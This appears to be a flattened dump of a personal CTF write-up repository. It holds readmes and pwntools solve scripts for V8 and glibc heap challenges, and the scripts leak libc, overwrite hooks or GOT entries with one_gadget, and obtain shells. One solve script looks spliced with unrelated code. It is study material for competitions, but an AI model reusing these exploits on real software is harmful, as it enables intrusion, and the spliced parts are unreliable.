drw-r----x 1 root root 4096 Jan 26 10:22 .. 32 | -rw-r----- 1 root guest 39 Jan 26 08:50 flag 33 | -rwxr-x--- 1 root guest 258904 Jan 14 16:59 jsc 34 | $ cat flag 35 | flag{4240a8444fe8734044fca90700b3ade2} 36 | [*] Got EOF while reading in interactive 37 | ''' 38 | 39 | -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/1.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/2.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/3.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/4.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/5.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/6.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/7.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/8.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/readme.md: -------------------------------------------------------------------------------- 1 | # PlaidCTF 2018 Roll-a-d8 2 | 3 | From the question : 4 | 5 | ``` 6 | This might only be helpful to Google employees... or is it? https://crbug.com/821137 7 | ``` 8 | 9 | We can search for the regression test under v8 's repo, but we need to slightly modify the test before really can trigger crashes 10 | 11 | You have to modify the maxsize (increase) before triggering the crash on the d8 engine with the regression test 12 | 13 | After triggering the bug , we can leak the address of the array buffer with the help of the oobArray : 14 | ![alt text](1.png) 15 | 16 | The buffer address is highlighted in red,while yellow box if pointed to oobArray : 17 | ![alt text](2.png) 18 | 19 | We can leak the jit address by place it inside a {}, since object inside would be align each other within the memory region 20 | 21 | ![alt text](3.png) 22 | 23 | check under vmmap, we can see what we got is not within the rwx jit region: 24 | 25 | ![alt text](4.png) 26 | 27 | Locate to it, we saw there is a pointer belongs to the rwx region (red box): 28 | 29 | ![alt text](5.png) 30 | 31 | Locate that pointer , we saw something looks like instructions (red box): 32 | 33 | ![alt text](6.png) 34 | 35 | We can trigger sigtrap by overwriting it with 0xcc: 36 | 37 | ![alt text](7.png) 38 | 39 | 40 | Poped a xcalc :) 41 | ![alt text](8.png) 42 | 43 | 44 | # Reference and other exploits 45 | 46 | 1. https://pastebin.com/gtJA92j8 47 | 48 | 2. https://gist.github.com/sroettger/d077d3907999aaa0f89d11d956b438ea 49 | 50 | 3. https://gist.github.com/saelo/52985fe415ca576c94fc3f1975dbe837 51 | 52 | 4. https://gist.github.com/itszn/73cc299b9bcff1ed585e6206d1ade58e 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.001: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.001 -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.002: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.002 -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.003: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.003 -------------------------------------------------------------------------------- /fuzzer.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import random 3 | 4 | target_num=206847083506555800000 5 | offset=97*111*116 6 | #aot 7 | #dnyiicr 8 | #iycidrn 9 | #cirdyniaot 10 | #cinrinn 11 | #*98*100*110*119*97 12 | #ao 13 | goal=target_num/offset 14 | 15 | test='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' 16 | ##ilnxKM 17 | ##ord 12679cdt%ay 18 | #anagram dictionary 19 | #http://samueltang.net/myonnineribble/stagefive-5880bb3cc95edcf2c43e70ad4b1bdf895cdc62bd/dictionary.php 20 | length=len(test) 21 | 22 | def randstring(length=7): 23 | valid_letters='abcdefghijklmnopqrstuvwxyz' 24 | return ''.join((random.choice(valid_letters) for i in xrange(length))) 25 | 26 | 27 | def ordd(strr): 28 | length=len(strr) 29 | check_sum=1 30 | for i in range(length): 31 | check_sum=check_sum*ord(strr[i]) 32 | return check_sum 33 | ok=0 34 | string=[] 35 | solution=0 36 | while(solution!=10): 37 | temp=randstring() 38 | #print temp 39 | if(ordd(temp)==goal): 40 | print str(aot+temp) 41 | ok=1 42 | solution+=1 43 | 44 | 45 | -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/1.png -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/2.png -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/babyheap_69a42acd160ab67a68047ca3f9c390b9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/babyheap_69a42acd160ab67a68047ca3f9c390b9 -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/libc-2.23.so -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/libc.so.6_b86ec517ee44b2d6c03096e0518c72a1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/libc.so.6_b86ec517ee44b2d6c03096e0518c72a1 -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/readme.md: -------------------------------------------------------------------------------- 1 | # 0CTF 2017 Babyheap 2 | 3 | # Logs 4 | 5 | ```Python 6 | [+] Starting local process './babyheap_69a42acd160ab67a68047ca3f9c390b9': pid 210 7 | [*] '/home/work/0ctf_2017/babyheap/libc-2.23.so' 8 | Arch: amd64-64-little 9 | RELRO: Partial RELRO 10 | Stack: Canary found 11 | NX: NX enabled 12 | PIE: PIE enabled 13 | [*] Paused (press any to continue) 14 | [*] Paused (press any to continue) 15 | [*] leaking libc 16 | x\xbb\x93\x8dr\x7f\x00\x00x\xbb\x93\x8dr\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 17 | 18 | leaked : 0x7f728d93bb78 19 | libc base = 0x7f728d577000 20 | realloc_hook = 0x7f728d93bb08 21 | malloc_hook = 0x7f728d93bb10 22 | onegadget 0x7f728d5bc26a 23 | fake chunk : 0x7f728d93baed 24 | [*] Paused (press any to continue) 25 | [*] Switching to interactive mode 26 | 1. Allocate 27 | 2. Fill 28 | 3. Free 29 | 4. Dump 30 | 5. Exit 31 | Command: $ 32 | $ 33 | $ id 34 | uid=0(root) gid=0(root) groups=0(root) 35 | $ 36 | 37 | ``` 38 | shifted fake chunk: 39 | 40 | ![alt text](1.png) 41 | 42 | 43 | original position: 44 | 45 | ![alt text](2.png) 46 | 47 | 48 | # Reference 49 | 50 | 1. http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html 51 | 52 | 2. https://github.com/shellphish/how2heap/blob/master/fastbin_dup_into_stack.c 53 | 54 | 3. https://poning.me/2017/03/24/baby-heap-2017/ 55 | 56 | 4. http://0x48.pw/2017/08/01/0x36/ 57 | -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./babyheap_69a42acd160ab67a68047ca3f9c390b9') 4 | #r=process('./babyheap_69a42acd160ab67a68047ca3f9c390b9',env={"LD_PRELOAD": "./libc.so.6_b86ec517ee44b2d6c03096e0518c72a1"}) 5 | #libc = ELF('libc.so.6_b86ec517ee44b2d6c03096e0518c72a1') 6 | libc=ELF("libc-2.23.so") 7 | #gdb.attach(r) 8 | 9 | pause() 10 | def allocate(size): 11 | r.sendline("1") 12 | r.recvuntil(": ") 13 | r.sendline(str(size)) 14 | r.recvuntil(": ") 15 | sleep(1) 16 | 17 | 18 | def fill(num,content): 19 | r.sendline("2") 20 | r.recvuntil(": ") 21 | r.sendline(str(num)) 22 | r.recvuntil(": ") 23 | r.sendline(str(len(content))) 24 | r.recvuntil(": ") 25 | r.sendline(content) 26 | r.recvuntil(": ") 27 | sleep(2) 28 | 29 | def free(num): 30 | r.sendline("3") 31 | r.recvuntil(": ") 32 | r.sendline(str(num)) 33 | r.recvuntil(": ") 34 | sleep(1) 35 | 36 | 37 | allocate(0x20)#0 38 | allocate(0x20)#1 39 | allocate(0x20)#2 40 | allocate(0x20)#3 41 | allocate(0x100)#4 42 | allocate(0x20) 43 | 44 | fill(4,"ZZZZZZZZ") 45 | pause() 46 | 47 | free(0) 48 | free(2) 49 | fill(1,"D"*(0x20+8)+p64(0x31)+"\xc0") 50 | fill(3,"Q"*(0x20+8)+p64(0x31)+("x")*40+p64(0x31)) 51 | 52 | allocate(0x20) 53 | allocate(0x20)# get number 4 chunk but name no2 54 | 55 | fill(3,"Q"*(0x20+8)+p64(0x111)) 56 | free(4) 57 | 58 | log.info("leaking libc") 59 | r.recvuntil(": ") 60 | r.recvuntil(": ") 61 | r.recvuntil(": ") 62 | r.recvuntil(": ") 63 | r.recvuntil(": ") 64 | 65 | r.sendline("4") 66 | r.recvuntil(": ") 67 | r.sendline("2") 68 | r.recvuntil("\n") 69 | leak=r.recvuntil("\n") 70 | print leak 71 | leaked=leak[:6] 72 | leaked=u64(leaked.ljust(8,"\x00")) 73 | print "leaked : "+hex(leaked) 74 | #cloud 75 | libc_base=leaked-3951480 76 | 77 | #local 78 | #libc_base=leaked-3771224 79 | 80 | print "libc base = "+hex(libc_base) 81 | realloc_hook=libc_base+libc.symbols['__realloc_hook'] 82 | print "realloc_hook = "+hex(realloc_hook) 83 | malloc_hook=libc_base+libc.symbols['__malloc_hook'] 84 | print "malloc_hook = "+hex(malloc_hook) 85 | #local 86 | #one=libc_base+0x3f32a 87 | 88 | #cloud 89 | one=libc_base+0x4526a 90 | print "onegadget "+hex(one) 91 | 92 | 93 | #exploit 94 | allocate(0x60)#4 95 | allocate(0x60)#6 96 | free(6) 97 | fill(4,"X"*(0x60+8)+p64(0x71)+p64(malloc_hook-35)) 98 | free(1)# to clean up the 0x78 on the main_arena, since it will cause size problem on the heap 99 | 100 | allocate(0x60)#1 101 | allocate(0x60)#6 : 0x0000000001bf3170 0x0000000001bf3170 104 | # 0x6020b0 : 0x0000000001bf3010 0x0000000001bf3220 105 | #3 rd pointer 106 | 107 | 108 | add(0,30,"X") 109 | add(1,800,"T"*300) 110 | add(2,500,"B"*300) 111 | add(3,128,"X") 112 | 113 | free(3) 114 | free(2) 115 | free(1) 116 | free(0) 117 | known_heap=heapbase+0x190 118 | #add(1,900,"Q"*(96)+"P"*(900-112+16)) 119 | pop_rax_ret=0x0000000000035f98+libc_base 120 | print "pop_rax_ret : "+hex(pop_rax_ret) 121 | #add(1,900,"Q"*96+p64(one_gadget)*100) 122 | rop=p64(pop_rax_ret)+p64(system) 123 | #fake heap 124 | # add(1,900,rop+"Q"*(96-len(rop)+48)+p64(known_heap)+p64(heapbase+0x220+32)+p64(0)+p64(0x91)) 125 | 126 | add(1,900,"Q"*(96+48)+p64(one_gadget)) 127 | 128 | print "[+] Get Shell " 129 | r.sendline("3") 130 | r.recvuntil(":") 131 | r.sendline("3") 132 | r.sendline("ls -al") 133 | 134 | 135 | r.interactive() 136 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/auir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 auir/auir -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 auir/libc-2.23.so -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | # Reference: 6 | 7 | 1. https://github.com/isislab/CSAW-CTF-2017-Quals/tree/master/pwn/auir 8 | 9 | 2. https://ctf-wiki.github.io/ctf-wiki/pwn/heap/fastbin_attack.html 10 | 11 | 3. https://glennmcgui.re/csaw-17-auir/ 12 | 13 | 4. http://blog.isis.poly.edu/2017/09/30/csaw-ctf-2017-auir/ 14 | 15 | 5. https://github.com/ymgve/ctf-writeups/tree/master/csaw2017quals/pwn200-auir 16 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 zone/libc-2.23.so -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r=process('./zone',env={"LD_PRELOAD": "./libc-2.23.so"}) 5 | libc = ELF('libc-2.23.so') 6 | gdb.attach(r) 7 | 8 | def allocate(size): 9 | r.sendline("1") 10 | r.sendline(str(size)) 11 | r.recvuntil("5) Exit\n") 12 | sleep(1) 13 | 14 | 15 | def delete(): 16 | r.sendline("2") 17 | r.recvuntil("5) Exit\n") 18 | sleep(0.5) 19 | 20 | def write(content): 21 | r.sendline("3") 22 | sleep(1) 23 | r.sendline(content) 24 | r.recvuntil("5) Exit\n") 25 | pause() 26 | r.recvuntil(": ") 27 | env=r.recvuntil("\n") 28 | env=int(env[:-1],16) 29 | print "env :"+hex(env) 30 | put_got=0x0000000000607020 31 | allocate(0x40) 32 | write("A"*0x40+"\x80") 33 | allocate(0x40) 34 | write("B"*0x40) 35 | allocate(0x40) 36 | write("C"*0x40) 37 | delete() 38 | delete() 39 | allocate(0x80) 40 | write("D"*(0x40)+"X"*8) 41 | 42 | #leak libc 43 | r.sendline("4") 44 | r.recvuntil("XXXXXXXX") 45 | leak=r.recvuntil("\n") 46 | print len(leak) 47 | print leak 48 | 49 | leak=leak.ljust(8,"\x00") 50 | leak=hex(u64(leak)) 51 | 52 | leak="0x"+leak[3:] 53 | leak=int(leak,16) 54 | 55 | print "leaked libc :"+hex(leak) 56 | r.recvuntil("5) Exit\n") 57 | 58 | put_lib=leak-5741152 59 | libc_base=put_lib-libc.symbols['puts'] 60 | system=libc_base+libc.symbols['system'] 61 | one=libc_base+0x45216 62 | print "libcbase : "+hex(libc_base) 63 | print "puts : "+hex(put_lib) 64 | print "system : "+hex(system) 65 | print "one : "+hex(one) 66 | delete() 67 | allocate(0x80) 68 | write("D"*(0x40)+"Q"*8+p64(put_got-0x10)+"R"*8+"S"*8) 69 | allocate(0x40) 70 | write("SSSSSSSS") 71 | allocate(0x40) 72 | print "[+] write one gadget" 73 | r.sendline("3") 74 | sleep(1) 75 | r.sendline(p64(one)) 76 | r.sendline("ls -al") 77 | 78 | r.interactive() 79 | 80 | #with write("ZZZZZZZZ") 81 | # env :0x7fffc2f7b540 82 | # 7 83 | 84 | # leaked libc :0x7f67c34370f0 85 | # libcbase : 0x7f67c2e4e000 86 | # puts : 0x7f67c2ebd690 87 | # one : 0x7f67c2e93216 88 | 89 | # 0x607020: 0x00007f67c2ebd690 0x0000000000000000 90 | # 0x607030: 0x5a5a5a5a5a5a5a5a 0x00007f67c2ebde70 91 | # 0x607040: 0x00000000004009e6 0x00007f67c2f45220 92 | # 0x607050: 0x00007f67c2e6e740 0x00007f67c2eb87e0 93 | # 0x607060: 0x0000000000400a26 0x0000000000400a36 94 | # 0x607070: 0x0000000000400a46 0x0000000000400a56 95 | # 0x607080: 0x0000000000400a66 0x0000000000400a76 96 | # 0x607090: 0x0000000000400a86 0x00007f67c2b5b790 97 | # 0x6070a0: 0x0000000000400aa6 0x00007f67c2f4f640 98 | # 0x6070b0: 0x0000000000000000 0x0000000000000000 99 | # 0x6070c0 : 0x00007f67c3213620 0x0000000000000000 100 | # 0x6070d0: 0x0000000000000000 0x0000000000000000 101 | # 0x6070e0: 0x0000000000000000 0x0000000000000000 102 | # 0x6070f0: 0x0000000000000000 0x0000000000000000 103 | # 0x607100: 0x0000000000000000 0x0000000000000000 104 | # 0x607110: 0x0000000000000000 0x0000000000000000 105 | # 0x607120: 0x0000000000000000 0x0000000000000000 106 | # 0x607130: 0x0000000000000000 0x0000000000000000 107 | # 0x607140: 0x0000000000000000 0x0000000000000000 108 | # 0x607150: 0x0000000000000000 0x0000000000000000 109 | 110 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/zone: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 zone/zone -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/7ae39f9f3910ac6928dffc35a2b25548: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/7ae39f9f3910ac6928dffc35a2b25548 -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg1.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg2.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg3.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/libc.so.6 -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/readme.md: -------------------------------------------------------------------------------- 1 | # Super Marimo - 375pts (Pwn) 2 | 3 | 題目: 4 | 5 | 6 | >Super Marimo - 375pts (Pwn) 7 | > 8 | >nc ch41l3ng3s.codegate.kr 3333 9 | > 10 | >[Download](7ae39f9f3910ac6928dffc35a2b25548) 11 | 12 | 13 | 14 | 呢題點解值375, 其實我都晤太明 :/ 15 | 16 | 可能係reverse個部份比較麻煩掛 17 | 18 | 19 | menu: 20 | 21 | ``` 22 | [V]iew my bowls 23 | [B]uy marimo 24 | [S]ell marimo 25 | [A]bout 26 | [Q]uit 27 | >> 28 | 29 | ``` 30 | 31 | 32 | 難點就係佢有個hidden menu, 要你打show me the marimo 先可以add marimo 上去 33 | 34 | 加marimo個陣,首先input maximum 0x10 做name, 0x20做profile 35 | 36 | 加完之後就可以去View到望下隻marimo 37 | 38 | 39 | view : 40 | 41 | ``` 42 | [V]iew my bowls 43 | [B]uy marimo 44 | [S]ell marimo 45 | [A]bout 46 | [Q]uit 47 | >> V 48 | == Marimo's bowl List == 49 | [ bowl 0 ] 50 | Select number or [B]ack 51 | >> 0 52 | birth : 1517739842 53 | current time : 1517739851 54 | size : 10 55 | price : 50 56 | name : AAAA 57 | profile : BBBB 58 | [M]odify / [B]ack ? 59 | >> 60 | 61 | ``` 62 | 63 | Bug就係呢到,個modifiy冇做bound checking ,搞到可以input >0x20 char 入profile, 引致heap overflow 64 | 65 | 66 | 望下個heapview先 (我已經加左(AAAA,BBBB),(CCCC,DDDD) marimo入去) 67 | 68 | 69 | ![alt text](cg1.png) 70 | 71 | 72 | 73 | 74 | 可以假設佢係類似嘅struct: 75 | 76 | ```C++ 77 | 78 | struct marimo { 79 | char *name; 80 | char *profile; 81 | }; 82 | 83 | 84 | ``` 85 | 86 | overflowed heap: 87 | 88 | ![alt text](cg2.png) 89 | 90 | 91 | 哈 又真係overflow到喎 92 | 93 | 94 | 95 | view 1又會炒 96 | 97 | GDB view: 98 | 99 | 100 | ![alt text](cg3.png) 101 | 102 | 103 | 104 | # Exploit 105 | 106 | 只要我地有一個crafted "valid" heap structure ,fake 到edit 以為 char *profile 個個位支pointer 係一支"valid" pointer,就可以有arbitary write 107 | 108 | 咁可以write邊? puts->one_gadget_rce->get shell 109 | 110 | 111 | solution: [solve.py](solve.py) 112 | 113 | 114 | ``` 115 | [*] Paused (press any to continue) 116 | leaked libcbase =0x7f1cf459c000 117 | leaked malloc =0x7f1cf4620130 118 | leaked one =0x7f1cf45e1216 119 | [*] Switching to interactive mode 120 | $ ls 121 | flag 122 | marimo 123 | $ cat flag 124 | But_every_cat_is_more_cute_than_Marimo 125 | $ 126 | 127 | ``` 128 | -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process("./marimo") 4 | host="ch41l3ng3s.codegate.kr" 5 | 6 | port=3333 7 | r = remote(host,port) 8 | libc=ELF("./libc.so.6") 9 | 10 | 11 | #gdb.attach(r) 12 | def add(name,content): 13 | r.sendline("show me the marimo") 14 | r.recvuntil(">> ") 15 | r.sendline(name) 16 | r.recvuntil(">> ") 17 | r.sendline(content) 18 | r.recvuntil(">> ") 19 | sleep(1) 20 | 21 | def edit(number,content): 22 | r.sendline("V") 23 | r.sendline(str(number)) 24 | r.sendline("M") 25 | r.recvuntil(">> ") 26 | r.sendline(content) 27 | r.recvuntil(">> ") 28 | r.sendline("B") 29 | r.recvuntil(">> ") 30 | sleep(2) 31 | 32 | def leak(number): 33 | r.sendline("V") 34 | r.sendline(str(number)) 35 | r.recvuntil("name : ") 36 | leak=r.recvuntil("\n") 37 | #print leak 38 | #print len(leak) 39 | #print hex(u64(leak[:-1].ljust(8,"\x00"))) 40 | leak=hex(u64(leak[:-1].ljust(8,"\x00"))) 41 | r.recvuntil(">> ") 42 | r.sendline("B") 43 | r.recvuntil(">> ") 44 | sleep(2) 45 | return leak 46 | 47 | 48 | 49 | malloc_got=0x0000000000603050 50 | put_got=0x0000000000603018 51 | 52 | pause() 53 | r.recvuntil(">> ") 54 | add("PPPP","QQQQ") 55 | add("RRRR","SSSS") 56 | add("TTTT","UUUU") 57 | add("VVVV","WWWW") 58 | edit(0,"Q"*8+p64(0)*4+p64(0x21)+p64(0x000000015a75b885)+p64(malloc_got)+p64(put_got)) 59 | #sleep(10) 60 | r.recvuntil(">> ") 61 | 62 | malloc=leak(1) 63 | malloc=int(malloc,16) 64 | 65 | lib_base=malloc-libc.symbols['malloc'] 66 | one=lib_base+0x45216 67 | print "leaked libcbase ="+hex(lib_base) 68 | print "leaked malloc ="+hex(malloc) 69 | print "leaked one ="+hex(one) 70 | 71 | sleep(20) 72 | edit(1,p64(one)) 73 | 74 | 75 | 76 | r.interactive() 77 | 78 | 79 | # 0x45216 execve("/bin/sh", rsp+0x30, environ) 80 | # constraints: 81 | # rax == NULL 82 | 83 | # 0x4526a execve("/bin/sh", rsp+0x30, environ) 84 | # constraints: 85 | # [rsp+0x30] == NULL 86 | 87 | # 0xf02a4 execve("/bin/sh", rsp+0x50, environ) 88 | # constraints: 89 | # [rsp+0x50] == NULL 90 | 91 | # 0xf1147 execve("/bin/sh", rsp+0x70, environ) 92 | # constraints: 93 | # [rsp+0x70] == NULL 94 | 95 | 96 | # [*] Paused (press any to continue) 97 | # leaked libcbase =0x7f1cf459c000 98 | # leaked malloc =0x7f1cf4620130 99 | # leaked one =0x7f1cf45e1216 100 | # [*] Switching to interactive mode 101 | # $ ls 102 | # flag 103 | # marimo 104 | # $ cat flag 105 | # But_every_cat_is_more_cute_than_Marimo 106 | # $ 107 | -------------------------------------------------------------------------------- /heap/Jarvis0J/guestbook2/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | #Reference: 5 | 1.http://veritas501.space/2017/03/10/JarvisOJ_WP/ 6 | 7 | 2.http://www.wooy0ung.me/writeup/2017/07/31/jarvisoj-guestbook2/ 8 | -------------------------------------------------------------------------------- /heap/Jarvis0J/guestbook2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local=1 4 | #r=process('./guestbook2',env={"LD_PRELOAD": "./libc.so.6"}) 5 | #libc = ELF('libc.so.6') 6 | if local: 7 | r=process('./guestbook2') 8 | libc = ELF('libc-2.24_64.so') 9 | gdb.attach(r) 10 | 11 | else: 12 | host = "pwn.jarvisoj.com" 13 | port = 9879 14 | r = remote(host,port) 15 | libc = ELF('libc.so.6') 16 | 17 | def list(no): 18 | r.sendline("1") 19 | 20 | 21 | def new(len,content): 22 | r.sendline("2") 23 | r.recvuntil(":") 24 | r.sendline(str(len)) 25 | r.recvuntil(":") 26 | r.send(content) 27 | r.recvuntil(":") 28 | sleep(1) 29 | 30 | def edit(no,len,content): 31 | r.sendline("3") 32 | r.recvuntil(":") 33 | r.sendline(str(no)) 34 | r.recvuntil(":") 35 | r.sendline(str(len)) 36 | r.recvuntil(":") 37 | r.send(content) 38 | r.recvuntil(":") 39 | sleep(1) 40 | 41 | def free(no): 42 | r.sendline("4") 43 | r.recvuntil(":") 44 | r.sendline(str(no)) 45 | r.recvuntil(":") 46 | 47 | new(0x80,"A"*0x80)#0 48 | new(0x80,"B"*0x80)#1 49 | new(0x80,"C"*0x80)#2 50 | 51 | free(1) 52 | 53 | edit(0,0x90,("A"*0x80)+("D"*0x10)) 54 | 55 | #leak libc 56 | r.sendline("1") 57 | r.recvuntil("DDDDDDDDDDDDDDDD") 58 | leak=r.recvuntil("\n") 59 | print leak 60 | print len(leak) 61 | leak=u64(leak[:-1].ljust(8,"\x00")) 62 | #leak=u64(leak[:-1].ljust(8,"\x00")) 63 | print "leaked :"+hex(leak) 64 | free_got=0x0000000000602018 65 | put_got=0x0000000000602020 66 | 67 | if local: 68 | libc_base=leak-3268136-libc.symbols['malloc'] 69 | system=libc_base+libc.symbols['system'] 70 | atoi=libc_base+libc.symbols['atoi'] 71 | print "libc_base : "+hex(libc_base) 72 | print "system : "+hex(system) 73 | print "atoi : "+hex(atoi) 74 | pause() 75 | 76 | 77 | else: 78 | a=1 79 | 80 | #clean heap 81 | free(0) 82 | free(2) 83 | 84 | new(0x80,"A"*0x80)#0 85 | new(0x80,"B"*0x80)#1 86 | new(0x80,"C"*0x80)#2 87 